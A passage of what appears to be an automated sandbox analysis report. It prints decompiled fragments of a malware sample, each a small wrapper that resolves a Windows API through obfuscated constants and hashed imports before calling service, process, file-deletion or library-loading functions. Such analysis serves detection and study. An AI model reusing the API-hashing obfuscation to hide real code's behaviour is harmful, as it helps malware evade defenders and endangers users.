                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E0021602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E0021602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E0021602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00214859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E0021602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E0021602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
